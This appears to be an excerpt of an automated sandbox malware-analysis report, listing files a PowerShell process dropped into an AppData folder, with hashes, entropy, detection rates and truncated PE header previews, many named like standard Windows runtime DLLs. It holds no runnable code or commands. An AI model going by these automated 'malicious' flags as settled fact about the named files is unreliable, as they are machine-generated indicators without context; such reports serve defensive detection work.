                                                                                                                                                          SHA1:67670BABECA5CFEC1ABE45E01F66A19F13063CE6
                                                                                                                                                          SHA-256:8FE48F3E443A13D6D47EDF188FF5F12CBBDA662FF095027009D7F5A5A4B5EE99
                                                                                                                                                          SHA-512:B9902808FA40105C1C610494258F87207604D3933E40D2A31D64E37813BC4C83DC69094C9C1E6F69742F9CDAEA7250CFD9FB6D433C476BC89C5525ADD0ACD1B8
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......H.....................l............... .....P.................................................................P..d'...`.......................t...K.......].............."....................................y...............................text............................... ..`.itext.............................. ..`.data...\!... ..."..................@....bss....<....P.......*...................idata.......`.......*..............@....edata..d'...P...(..................@..@.rdata.."............8..............@..@.reloc...^.......`...:..............@..B.rsrc...............................@..@.....................t..............@..@................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18384
                                                                                                                                                          Entropy (8bit):7.060392296328683
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:29001F316CCFC800E2246743DF9B15B3
                                                                                                                                                          SHA1:DC734266648D3463C1F8D88C1CE7D900A4E3B26C
                                                                                                                                                          SHA-256:E5EA2C21FB225090F7D0DB6C6990D67B1558D8E834E86513BC8BA7A43C4E7B36
                                                                                                                                                          SHA-512:4CFFC0C6F94FCD1155909993C622B9103ABD7A7BCE88742A10ABD6A3496A334D667A39BB601F99EB174AA847D7DAE056E0D9769754CA86320579B262A20A6599
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...I............." .........................................................0......K.....`.........................................`................ ...................9..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-profile-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17360
                                                                                                                                                          Entropy (8bit):7.138145958834492
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6EE66DCA31C5CCE57740D677C85B4CE7
                                                                                                                                                          SHA1:8969DB03F98F9548CAF8E2D8C7F2F5CD7071F333
                                                                                                                                                          SHA-256:D00A0EDACE14715BF79DBD17B715D8A74A2300F0ADB1F3FC137EDFB7074C9B0A
                                                                                                                                                          SHA-512:592E3B6C689A0D6C87079C54C3E13E6EE1FC0C5C770ABC854040E85464687C46F0A558BE22F8759DBC4A100810386EE379FFE4359CF9091D9AFAE548BC597BE2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...xc.].........." .........................................................0......b.....`.........................................`................ ...................9..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18384
                                                                                                                                                          Entropy (8bit):7.019765652631857
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:0069FD29263C0DD90314C48BBCE852EF
                                                                                                                                                          SHA1:DFB99C850A69E67E85F0A0985659F325BD8F84FC
                                                                                                                                                          SHA-256:D11093FDC1D5C9213B9B2886CE91DB3DED17EF8DAE1615A8C7FFBC55B8E3F79B
                                                                                                                                                          SHA-512:71965E8DD2FD81D0C6DBA4DBEC8D2D1BFD4A644EF6BBA4F6027DE4BCDF9C07DA16F27F2156C21B52E678C75F0A93A4BCBC3E1942F0A73F1EEA5FF64B70662F70
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...L.\w.........." .........................................................0.......t....`.........................................`................ ...................9..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-string-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17872
                                                                                                                                                          Entropy (8bit):7.081667069114702
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:2E5C29FC652F432B89A1AFE187736C4D
                                                                                                                                                          SHA1:96F8480B9339411D5D8C94918E983523B1A55C56
                                                                                                                                                          SHA-256:3807DB7ACF1B40C797E4D4C14A12C3806346AE56B25E205E600BE3E635C18D4F
                                                                                                                                                          SHA-512:FE1135532E18127F2CFEFAAA4A19020D6C790374F648DC93383D58EE52B147D1451AF01B8624234BD5D77ABE2451EB3E15CBE72A19D283F00CF78C05C43041DF
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................." .........................................................0......s.....`.........................................`................ ...................9..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-synch-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):19920
                                                                                                                                                          Entropy (8bit):6.982364402821961
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:979C67BA244E5328A1A2E588FF748E86
                                                                                                                                                          SHA1:4C709CE527550EB7534CB6362AFDB3623C98254E
                                                                                                                                                          SHA-256:8BB38A7A59FBAA792B3D5F34F94580429588C8C592929CBD307AFD5579762ABC
                                                                                                                                                          SHA-512:49F3C3319AA462B445C6A0B816E10034F6E5A9CF1250EA30B348CFA1EF71525E9F62E2F13253F61375F51FC574847DE0D509CFFA95103771BE356327D5FEF90D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0.......K....`.........................................`...X............ ...................9..............T............................................................................rdata..X...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-synch-l1-2-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18384
                                                                                                                                                          Entropy (8bit):7.088266400086267
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:659E4FEBC208545A2E23C0C8B881A30D
                                                                                                                                                          SHA1:11B890CC05C1E7C95F59EDA4BB8CE8BC12B81591
                                                                                                                                                          SHA-256:9AC63682E03D55A5D18405D336634AF080DD0003B565D12A39D6D71AAA989F48
                                                                                                                                                          SHA-512:010AB6D3971FABD2A956F891B8D9D20EF487E722443B2882A1A329830DC5C80D262E03A844CD3F5C3E4EFCFBAD72B9E1FBBF7D9DC6CF85ED034D84726946CE07
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0............`.........................................`...x............ ...................9..............T............................................................................rdata..x...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-sysinfo-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18896
                                                                                                                                                          Entropy (8bit):7.013421195915214
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:CEF4B9F680FAAE322170B961A3421C5B
                                                                                                                                                          SHA1:DD89A2D355DF989BBD8648789472BFE9C14AFCD5
                                                                                                                                                          SHA-256:1FE918979F1653D63BB713D4716910D192CD09F50017A6ECB4CE026ED6285DF9
                                                                                                                                                          SHA-512:F56617290D4AC25231631D708A6C8B003BDD358BAE9672F7DEE539A96B292C13E04C65BA5F05937C52F73288EB3DD7CBA479ED030942A0D9D3A15512548FA4A9
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...hI$..........." .........................................................0............`.........................................`...H............ ...................9..............T............................................................................rdata..H...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-timezone-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18384
                                                                                                                                                          Entropy (8bit):7.0823956037120475
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:69DF2CCE4528C9E38D04A461BA1F992B
                                                                                                                                                          SHA1:BB1D0DA76CF696ACF2E0F4E03E6D63FBAD4325AA
                                                                                                                                                          SHA-256:A108A8F20DED00E742A1F818EF00EB425990B6B24A2BCD060DEA4D7F06D3F165
                                                                                                                                                          SHA-512:4D02EECDDA0FFFC10D5509830079984C7A887B4CA3A80359AA56117B302DCFA594B0710C9F415C823D1674B5C689D31AADE44F21750CCD7D53010E67F0B6F0D2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....\]\.........." .........................................................0............`.........................................`...H............ ...................9..............T............................................................................rdata..H...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-core-util-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17872
                                                                                                                                                          Entropy (8bit):7.041259495908992
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C6553959AECD5BAC01C0673CFDF86B68
                                                                                                                                                          SHA1:045585659843F7214C79659A88302996BFB480A2
                                                                                                                                                          SHA-256:68BD9C086D210EB14E78F00988BA88CEAF9056C8F10746AB024990F8512A2296
                                                                                                                                                          SHA-512:AE8E42A428202D05FEA4F1E6A4D3B919B644A792567F876B0FC392B1CDDB856547B4C3B433C002FDED6DF4D4DAEC8FB7235F30D1FF9F42943D9E2557ADE364D6
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d......Z.........." .........................................................0............`.........................................`...<............ ...................9..............T............................................................................rdata..8...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-conio-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18896
                                                                                                                                                          Entropy (8bit):7.04162157199281
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:7190CBFAD2D7773D3B88CCC25533A651
                                                                                                                                                          SHA1:71FE2BACC14B433D51328EA0810C1A030C80D844
                                                                                                                                                          SHA-256:4AEEAE0AC9F6C1B0B8835067EA3B7FC429F353565F18DE7858F4EA5D6F72072E
                                                                                                                                                          SHA-512:B314666C400268BF261C5F9E9966AD0680435241E7A24D85B28AE4405D798B80EEDB65ED8DB7E8D93DF90F886A6719A8B7ACE8C25D0429392BC061868890C40C
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...='..........." .........................................................0.......>....`.......................................................... ...................9..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-convert-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):21968
                                                                                                                                                          Entropy (8bit):6.8725461224565505
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:3E415147CCD7C712618868BDD7A200CD
                                                                                                                                                          SHA1:B332F29915D846519DCB725D39E8C50604D7B414
                                                                                                                                                          SHA-256:77B69E829BDC26C7B2474BE6B8A2382345B2957E23046897E40992A8157A7BA1
                                                                                                                                                          SHA-512:7E7E50F148414F8A84B4C39D3C7C1E0952F86F95873F3ABC25B7F08574BBCCE41394A59451868020B178BF68DF12615BD356677E8C935C1185C5D07D15E61896
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d......n.........." .........................................................@............`..........................................................0...................9..............T............................................................................rdata..............................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-environment-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18384
                                                                                                                                                          Entropy (8bit):7.021659429657045
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:AD0CBB9978FCF60D9E9CA45DE6A28D30
                                                                                                                                                          SHA1:65549D9D7EE72DE7D0CC356F92AD22EEB8DC18CC
                                                                                                                                                          SHA-256:6C9C0DC7B36AFE07DFB07DD373FC757FF25DF4793E6384D7A6021471A474F0B9
                                                                                                                                                          SHA-512:AAF4919E7629CD0BCF52283D578214043A4BDF6597A7D808DFCECD5FA1ECBD0B1395C60A165C575D20CA42928500815E14837B9E05530A667C6898E14243D64D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...... .........." .........................................................0............`............................................."............ ...................9..............T............................................................................rdata..2...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):19920
                                                                                                                                                          Entropy (8bit):7.031497633335967
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:14F407D94C77B1B0039AE2C89B07A2FF
                                                                                                                                                          SHA1:528B91A8A8611DA45463FAC0A6BD5C58233F8FBC
                                                                                                                                                          SHA-256:85B1B189CE9E3C6F4D2EFDD4CD82B0807F681BEA2D28851CAAF545990DE99000
                                                                                                                                                          SHA-512:152B97A656ACD984592BF58854222EC97C661F9F8D19557EA03501457FB5A07821F90D332F21B1B51A5BCE5AB84F862354B8EE21C7C1F6B7AA1C127F4A73AB5D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....`W.........." .........................................................0............`.......................................................... ...................9..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-heap-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18896
                                                                                                                                                          Entropy (8bit):7.000635932635543
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:9C373C00AC3138233BDF1655C7BE8E86
                                                                                                                                                          SHA1:EE38F868E32950D1B8185249EDC6AD4E1BC5592F
                                                                                                                                                          SHA-256:0166EDFB23CFC77519C97862A538A69B5D805D6A17D6E235F46927AF5C04B3C9
                                                                                                                                                          SHA-512:D2F56B3169C1FEA1A604523B2215DBAD02C6306BD804445B367756F288310554DD049AEFD024BABC26A3B270B8AEDE8B10E5EC8D80E772D3D1076B8013491067
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....n.p.........." .........................................................0............`.......................................................... ...................9..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-locale-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18384
                                                                                                                                                          Entropy (8bit):7.080870494842615
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C5D747F96237B6E9AA85C58745D30C80
                                                                                                                                                          SHA1:C6AD21597265FAF25EA8D7F09577F3E6F4F7BE10
                                                                                                                                                          SHA-256:F16447B5FC7FE6FB8A6699A3CEF1B2B8BA92D408579BCC272D3DD76ACD801E2A
                                                                                                                                                          SHA-512:5BCEE06D62633ECDFDF5DD1BF92FF9278F535DC5F21BFE36FAACA15E378BEB4DA6BE7BA9767569119FBF9F7383FFDB3A4A17C99D5918A64B8E12926AC0EC3140
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................." .........................................................0......'.....`.............................................e............ ...................9..............T............................................................................rdata..u...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-math-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):27088
                                                                                                                                                          Entropy (8bit):6.650191961270333
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:BC418A3461C5FDFA1A0D75F7E03D08A7
                                                                                                                                                          SHA1:5CFEFA62226F117B7E2FE58961269294EB62B84C
                                                                                                                                                          SHA-256:C7115159BABDAA1F52E478E67B4E612DA2332FDA4E4036999B29425FE303B6E8
                                                                                                                                                          SHA-512:4C9F3D461A5FC42D829D517EF523423CEB18F6667E6F2D83F1E5CD645A359D32B58AC8652EA734F567ED3B9E2999F358BF0E95BF38265DF7ABE3FE4B2F5FA978
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...Q............." .........,...............................................P............`..............................................%...........@...............0...9..............T............................................................................rdata...&.......(..................@..@.rsrc........@.......,..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-multibyte-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):26064
                                                                                                                                                          Entropy (8bit):6.650909182376859
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:9E9C6F83A015029808F5257F7B7E39C6
                                                                                                                                                          SHA1:5674192EB60EB152773FE0D50161F32759E2EA0F
                                                                                                                                                          SHA-256:C6B4E1D903B3CC83BFAFFBE4E82EEE634CFF8F97F12217CAA45B464DDC4E1455
                                                                                                                                                          SHA-512:6E124732646CBE95EF94773D57B08C68A399854F906B14F15996BB12400D5E92B34596C38795A3BA4CDF8DB4E8DD5AD486890634951A4686C6679B486AB19CB0
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....]G.........." .........(...............................................P.......:....`.............................................. ...........@...............,...9..............T............................................................................rdata...".......$..................@..@.rsrc........@.......(..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-private-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):70608
                                                                                                                                                          Entropy (8bit):5.82653654092116
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:AD8D9A6EA592A6C8A78C67A805CEC952
                                                                                                                                                          SHA1:3E9F35013044BE456F33E300418453AB12C70DF8
                                                                                                                                                          SHA-256:696C10112D8B86A46E5057CBD0BF40728E79C6BB49CDA1F2C67FE45D0FC1258D
                                                                                                                                                          SHA-512:31C1B5717432B67E6B150911747F34E8099C1A0870262BB3B5D3AC5C9E28B3B08E4239BD105408318806F983B3FCD10E617B2385511C46EFE9FE58A9CD4A7067
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...)............." ................................................................0w....`.............................................T................................9..............T............................................................................rdata..d...........................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Roaming\zcZPHzDH\x86\api-ms-win-crt-process-l1-1-0.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18896
                                                                                                                                                          Entropy (8bit):7.015371870860414
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:66F4E530A19ED2F6862B5CE946437875
                                                                                                                                                          SHA1:016BFA4EAFB407E43ABDCD9582DBCA7DCF85D3DE
                                                                                                                                                          SHA-256:542A22540CDB7DF46D957A0208D50507916F7C737BEA833931239D56EBE8D68C
                                                                                                                                                          SHA-512:2653B2118F4DB250850DCEFD3536E0FD2BC55E9774376B51E586658E4E5D79A35CB425EBE0A8391124997E24C8AAA84BAC799162A31446EF47DB667A4A3F0EB9
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....-.........." .........................................................0......G~....`.............................................x............ ...................9..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          Static File Info

                                                                                                                                                          General

                                                                                                                                                          File type:ASCII text, with very long lines (65265), with CRLF line terminators
